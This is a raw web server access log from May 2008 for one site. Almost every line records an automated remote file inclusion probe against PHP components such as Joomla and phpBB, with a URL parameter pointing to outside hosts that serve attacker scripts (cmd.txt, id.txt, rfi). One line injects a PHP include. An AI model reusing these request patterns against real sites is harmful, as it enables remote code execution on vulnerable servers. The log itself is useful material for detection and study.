89.108.64.164 - - [24/May/2008:11:27:03 -0700] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://www.webhostmedic.com/p.c? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.11.17.16 - - [24/May/2008:11:27:28 -0700] "GET /logs/access.log//main.php?sayfa=http://www.snijdersverfenbehang.nl/cache/rfi? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
204.11.17.16 - - [24/May/2008:11:27:28 -0700] "GET //main.php?sayfa=http://www.snijdersverfenbehang.nl/cache/rfi? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
204.11.17.16 - - [24/May/2008:11:27:29 -0700] "GET /logs//main.php?sayfa=http://www.snijdersverfenbehang.nl/cache/rfi? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.163.169.99 - - [24/May/2008:11:27:33 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.108.64.164 - - [24/May/2008:11:27:34 -0700] "GET /logs/access_071229.log/components/com_simpleboard/image_upload.php?sbp=http://www.webhostmedic.com/p.c? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.20.46.121 - - [24/May/2008:11:28:11 -0700] "GET /logs/access_080113.log/errors.php?error=http://www.lynnlott.com/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.20.46.121 - - [24/May/2008:11:28:18 -0700] "GET /logs/access_080122.log/errors.php?error=http://www.lynnlott.com/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
61.19.121.124 - - [24/May/2008:11:28:21 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.19.121.124 - - [24/May/2008:11:28:28 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.apnic.net/index.html? HTTP/1.0" 200 4123 "-" "Mozilla/5.0" "www.dmulk.com"
200.234.200.124 - - [24/May/2008:11:28:50 -0700] "GET /logs/include/db.php?GLOBALS[rootdp]=http://skill-station.net/help/id.txt?t?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.234.200.124 - - [24/May/2008:11:28:51 -0700] "GET /include/db.php?GLOBALS[rootdp]=http://skill-station.net/help/id.txt?t?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.136.6.38 - - [24/May/2008:11:28:56 -0700] "GET /allinurl:%22*/tsep/include/colorswitch.php?tsep_config[absPath]=*%22http://elurbano.com/elurbano/administrator/components/com_jreactions/images/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
193.136.6.38 - - [24/May/2008:11:28:57 -0700] "GET /logs/allinurl:%22*/tsep/include/colorswitch.php?tsep_config[absPath]=*%22http://elurbano.com/elurbano/administrator/components/com_jreactions/images/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
161.58.178.229 - - [24/May/2008:11:29:04 -0700] "GET /logs//ws/login.php?includedir=http://kingsofwarcraft.com/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
161.58.178.229 - - [24/May/2008:11:29:04 -0700] "GET //ws/login.php?includedir=http://kingsofwarcraft.com/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.234.200.80 - - [24/May/2008:11:29:06 -0700] "GET /logs/include/db.php?GLOBALS[rootdp]=http://skill-station.net/help/id.txt?t?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.234.200.80 - - [24/May/2008:11:29:06 -0700] "GET /include/db.php?GLOBALS[rootdp]=http://skill-station.net/help/id.txt?t?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.212.165.42 - - [24/May/2008:11:29:06 -0700] "GET /logs/access.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.liautism.com/components/efnet.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.212.165.42 - - [24/May/2008:11:29:06 -0700] "GET /logs/access.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.liautism.com/components/efnet.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.212.165.42 - - [24/May/2008:11:29:06 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.liautism.com/components/efnet.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.212.165.42 - - [24/May/2008:11:29:06 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.liautism.com/components/efnet.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.212.165.42 - - [24/May/2008:11:29:06 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.liautism.com/components/efnet.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.212.165.42 - - [24/May/2008:11:29:07 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.liautism.com/components/efnet.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
77.244.44.10 - - [24/May/2008:11:29:21 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.geocities.com/cahayaindra/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
64.38.4.3 - - [24/May/2008:11:29:21 -0700] "GET /logs/senetman/html/index.php?page=http://www.ppxp.ru/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.38.4.3 - - [24/May/2008:11:29:21 -0700] "GET /logs/senetman/html/index.php?page=http://www.ppxp.ru/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.38.4.3 - - [24/May/2008:11:29:22 -0700] "GET /senetman/html/index.php?page=http://www.ppxp.ru/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.38.4.3 - - [24/May/2008:11:29:22 -0700] "GET /senetman/html/index.php?page=http://www.ppxp.ru/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
143.107.48.167 - - [24/May/2008:11:29:22 -0700] "GET /logs/access_080116.log//administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://www.comova.org.br/www/media/a2id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
143.107.48.167 - - [24/May/2008:11:29:22 -0700] "GET //administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://www.comova.org.br/www/media/a2id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
143.107.48.167 - - [24/May/2008:11:29:23 -0700] "GET /logs//administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://www.comova.org.br/www/media/a2id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.180.89.68 - - [24/May/2008:11:29:24 -0700] "GET /logs/senetman/html/index.php?page=http://201.6.243.67/UP/xs.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.180.89.68 - - [24/May/2008:11:29:24 -0700] "GET /senetman/html/index.php?page=http://201.6.243.67/UP/xs.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.244.44.10 - - [24/May/2008:11:29:25 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.geocities.com/cahayaindra/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
208.116.0.130 - - [24/May/2008:11:29:26 -0700] "GET /logs/access_080116.log//administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://www.comova.org.br/www/media/a2id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.116.0.130 - - [24/May/2008:11:29:26 -0700] "GET //administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://www.comova.org.br/www/media/a2id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.116.0.130 - - [24/May/2008:11:29:27 -0700] "GET /logs//administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://www.comova.org.br/www/media/a2id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
77.244.44.10 - - [24/May/2008:11:29:34 -0700] "GET /logs/?mosConfig_absolute_path=http://www.geocities.com/cahayaindra/test.txt??? HTTP/1.1" 200 48843 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
143.107.48.167 - - [24/May/2008:11:29:37 -0700] "GET /logs/access_080104.log//administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://www.comova.org.br/www/media/a2id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.116.0.130 - - [24/May/2008:11:29:41 -0700] "GET /logs/access_080104.log//administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://www.comova.org.br/www/media/a2id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
77.244.44.10 - - [24/May/2008:11:29:41 -0700] "GET /?mosConfig_absolute_path=http://www.geocities.com/cahayaindra/test.txt??? HTTP/1.1" 200 11606 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
66.230.197.245 - - [24/May/2008:11:29:59 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://gsis.bogo.net/bbs/tes.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.230.197.245 - - [24/May/2008:11:29:59 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://gsis.bogo.net/bbs/tes.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
62.141.39.235 - - [24/May/2008:11:30:27 -0700] "GET /logs/senetman/html/index.php?page=http://www.weber-computerdienst.de/extern/unikat-bensheim/newswriter_sw_1_3/include/ateam.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.141.39.235 - - [24/May/2008:11:30:28 -0700] "GET /senetman/html/index.php?page=http://www.weber-computerdienst.de/extern/unikat-bensheim/newswriter_sw_1_3/include/ateam.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
82.146.59.231 - - [24/May/2008:11:30:42 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.11.17.16 - - [24/May/2008:11:30:44 -0700] "GET /logs/access_080223.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.snijdersverfenbehang.nl/cache/rfi? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
204.11.17.16 - - [24/May/2008:11:30:44 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.snijdersverfenbehang.nl/cache/rfi? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
204.11.17.16 - - [24/May/2008:11:30:44 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.snijdersverfenbehang.nl/cache/rfi? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.84.143.195 - - [24/May/2008:11:30:55 -0700] "GET /logs/senetman/html/index.php?page=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.143.195 - - [24/May/2008:11:30:56 -0700] "GET /senetman/html/index.php?page=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.81.28 - - [24/May/2008:11:30:59 -0700] "GET /logs/access_080327.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.11.17.16 - - [24/May/2008:11:31:00 -0700] "GET /logs/access_080117.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.snijdersverfenbehang.nl/cache/rfi? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
204.11.17.16 - - [24/May/2008:11:31:01 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.snijdersverfenbehang.nl/cache/rfi? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
204.11.17.16 - - [24/May/2008:11:31:01 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.snijdersverfenbehang.nl/cache/rfi? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.64.81.28 - - [24/May/2008:11:31:30 -0700] "GET /logs/access_080327.log//admin/classes/TplLoad.php?full_path_to_public_program=http://zul.com.pl/mambots/system/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.11.17.16 - - [24/May/2008:11:31:40 -0700] "GET /logs/access_080117.log//modules/TotalCalendar/about.php?inc_dir=http://www.snijdersverfenbehang.nl/cache/rfi? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
204.11.17.16 - - [24/May/2008:11:31:41 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.snijdersverfenbehang.nl/cache/rfi? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
204.11.17.16 - - [24/May/2008:11:31:41 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.snijdersverfenbehang.nl/cache/rfi? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.11.122 - - [24/May/2008:11:31:42 -0700] "GET /logs/senetman/html/index.php?page=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.11.122 - - [24/May/2008:11:31:42 -0700] "GET /senetman/html/index.php?page=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.37.217.226 - - [24/May/2008:11:31:47 -0700] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=http://kiliclub.com/tmp/nid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.19.11.122 - - [24/May/2008:11:31:49 -0700] "GET /logs/senetman/html/index.php?page=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.11.122 - - [24/May/2008:11:31:50 -0700] "GET /senetman/html/index.php?page=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.16.148.38 - - [24/May/2008:11:31:55 -0700] "GET /logs/senetman/html/index.php?page=http://www.duclaux.net/wiki/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.16.148.38 - - [24/May/2008:11:31:55 -0700] "GET /senetman/html/index.php?page=http://www.duclaux.net/wiki/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.61.90 - - [24/May/2008:11:31:59 -0700] "GET /logs/access_080218.log//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://www.mode-gone.net/faq/faq.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
204.11.17.16 - - [24/May/2008:11:32:03 -0700] "GET /logs/access_071229.log//login.php?dir=http://www.snijdersverfenbehang.nl/cache/rfi? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
204.11.17.16 - - [24/May/2008:11:32:03 -0700] "GET //login.php?dir=http://www.snijdersverfenbehang.nl/cache/rfi? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
204.11.17.16 - - [24/May/2008:11:32:05 -0700] "GET /logs//login.php?dir=http://www.snijdersverfenbehang.nl/cache/rfi? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
204.11.17.16 - - [24/May/2008:11:32:05 -0700] "GET /logs/access_080117.log//login.php?dir=http://www.snijdersverfenbehang.nl/cache/rfi? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
204.11.17.16 - - [24/May/2008:11:32:26 -0700] "GET /logs/access_080211.log//modules/TotalCalendar/about.php?inc_dir=http://www.snijdersverfenbehang.nl/cache/rfi? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.64.195.220 - - [24/May/2008:11:32:30 -0700] "GET /logs/access_080116.log//administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://www.comova.org.br/www/media/a2id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.64.195.220 - - [24/May/2008:11:32:31 -0700] "GET //administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://www.comova.org.br/www/media/a2id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.11.17.16 - - [24/May/2008:11:32:31 -0700] "GET /logs/access_071229.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.snijdersverfenbehang.nl/cache/rfi? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.64.195.220 - - [24/May/2008:11:32:31 -0700] "GET /logs//administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://www.comova.org.br/www/media/a2id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.116.0.130 - - [24/May/2008:11:32:31 -0700] "GET /logs//administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://www.comova.org.br/www/media/a2id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.116.0.130 - - [24/May/2008:11:32:31 -0700] "GET //administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://www.comova.org.br/www/media/a2id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.6.11.215 - - [24/May/2008:11:32:50 -0700] "GET /presto/?S=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.19.61.90 - - [24/May/2008:11:33:02 -0700] "GET /logs/access_080218.log/language/lang_english/lang_main_album.php?phpbb_root_path=http://www.mode-gone.net/faq/faq.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.61.90 - - [24/May/2008:11:33:02 -0700] "GET /language/lang_english/lang_main_album.php?phpbb_root_path=http://www.mode-gone.net/faq/faq.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.61.90 - - [24/May/2008:11:33:03 -0700] "GET /logs/language/lang_english/lang_main_album.php?phpbb_root_path=http://www.mode-gone.net/faq/faq.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.61.90 - - [24/May/2008:11:33:13 -0700] "GET /logs/access_071224.log/language/lang_english/lang_main_album.php?phpbb_root_path=http://www.mode-gone.net/faq/faq.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.15.159.42 - - [24/May/2008:11:33:14 -0700] "GET /logs//errors.php?error=http://www.centenariosafa.com/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
64.15.159.42 - - [24/May/2008:11:33:19 -0700] "GET //errors.php?error=http://www.centenariosafa.com/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
80.86.123.123 - - [24/May/2008:11:33:25 -0700] "GET /logs/access.log/index.php?option=http://www.freewebtown.com/cioabi/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.86.123.123 - - [24/May/2008:11:33:31 -0700] "GET /logs/index.php?option=http://www.freewebtown.com/cioabi/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.86.123.123 - - [24/May/2008:11:33:32 -0700] "GET /index.php?option=http://www.freewebtown.com/cioabi/id.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
84.19.178.201 - - [24/May/2008:11:33:51 -0700] "GET /logs/senetman/html/index.php?page=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
84.19.178.201 - - [24/May/2008:11:33:52 -0700] "GET /senetman/html/index.php?page=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.64.195.220 - - [24/May/2008:11:33:53 -0700] "GET /logs/access_080104.log//administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://www.comova.org.br/www/media/a2id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.67.26.84 - - [24/May/2008:11:33:55 -0700] "GET /logs//main.php?sayfa=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.67.26.84 - - [24/May/2008:11:33:55 -0700] "GET //main.php?sayfa=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.11.17.16 - - [24/May/2008:11:34:04 -0700] "GET /logs/access_080225.log//main.php?sayfa=http://www.snijdersverfenbehang.nl/cache/rfi? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.111.173.45 - - [24/May/2008:11:34:34 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://amsny.org/site/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.64.195.220 - - [24/May/2008:11:34:48 -0700] "GET /logs//administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://www.comova.org.br/www/media/a2id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.64.195.220 - - [24/May/2008:11:34:49 -0700] "GET //administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://www.comova.org.br/www/media/a2id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
143.107.48.167 - - [24/May/2008:11:34:50 -0700] "GET /logs//administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://www.comova.org.br/www/media/a2id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
143.107.48.167 - - [24/May/2008:11:34:50 -0700] "GET //administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://www.comova.org.br/www/media/a2id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.173.45 - - [24/May/2008:11:35:11 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.webhostmedic.com/p.c? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
204.11.17.16 - - [24/May/2008:11:35:21 -0700] "GET /logs/access_071229.log//modules/vwar/admin/admin.php?vwar_root=http://www.snijdersverfenbehang.nl/cache/rfi? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
204.11.17.16 - - [24/May/2008:11:35:26 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.snijdersverfenbehang.nl/cache/rfi? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.26.137.64 - - [24/May/2008:11:35:26 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://gsis.bogo.net/bbs/tes.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [24/May/2008:11:35:27 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://gsis.bogo.net/bbs/tes.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
204.11.17.16 - - [24/May/2008:11:35:30 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.snijdersverfenbehang.nl/cache/rfi? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.58.181.74 - - [24/May/2008:11:35:55 -0700] "GET /logs/access_080218.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://medisana.co.kr/test? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.58.181.74 - - [24/May/2008:11:35:55 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://medisana.co.kr/test? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.58.181.74 - - [24/May/2008:11:36:01 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://medisana.co.kr/test? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
